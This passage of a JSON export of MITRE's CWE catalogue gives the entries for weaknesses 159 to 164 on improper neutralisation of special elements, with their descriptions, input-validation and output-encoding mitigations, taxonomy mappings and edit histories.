Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Null Character / Null Byte","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Null Character / Null Byte","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Null Byte or NUL Character","attr":{"@_Date":"2010-04-05"}}]}},"159":{"attr":{"@_ID":"159","@_Name":"Improper Handling of Invalid Use of Special Elements","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly filter, remove, quote, or otherwise manage the invalid use of special elements in user-controlled input, which could cause adverse effect on its behavior and integrity.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Common Special Element Manipulations"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":[{"#text":"The list of children for this entry is far from complete. However, the types of special elements might be too precise for use within CWE.","attr":{"@_Type":"Maintenance"}},{"#text":"Precise terminology for the underlying weaknesses does not exist. Therefore, these weaknesses use the terminology associated with the manipulation.","attr":{"@_Type":"Terminology"}},{"#text":"Customized languages and grammars, even those that are specific to a particular product, are potential sources of weaknesses that are related to special elements. However, most researchers concentrate on the most commonly used representations for data transmission, such as HTML and SQL. Any representation that is commonly used is likely to be a rich source of weaknesses; researchers are encouraged to investigate previously unexplored representations.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Common Special Element Manipulations","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Special Element","attr":{"@_Date":"2020-02-24"}}]}},"160":{"attr":{"@_ID":"160","@_Name":"Improper Neutralization of Leading Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled leading special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that leading special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Leading Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Leading Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Leading Special Element","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Leading Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"161":{"attr":{"@_ID":"161","@_Name":"Improper Neutralization of Multiple Leading Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple leading special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled multiple leading special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"160","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that multiple leading special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Leading Special Elements"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Multiple Leading Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Multiple Leading Special Elements","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Multiple Leading Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"162":{"attr":{"@_ID":"162","@_Name":"Improper Neutralization of Trailing Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled trailing special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that trailing special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Trailing Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"635"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Trailing Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Trailing Special Element","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Trailing Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"163":{"attr":{"@_ID":"163","@_Name":"Improper Neutralization of Multiple Trailing Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple trailing special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled multiple trailing special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that multiple trailing special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Trailing Special Elements"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Multiple Trailing Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Multiple Trailing Special Elements","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Multiple Trailing Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"164":{"attr":{"@_ID":"164","@_Name":"Improper Neutralization of Internal Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled internal special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that internal special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, 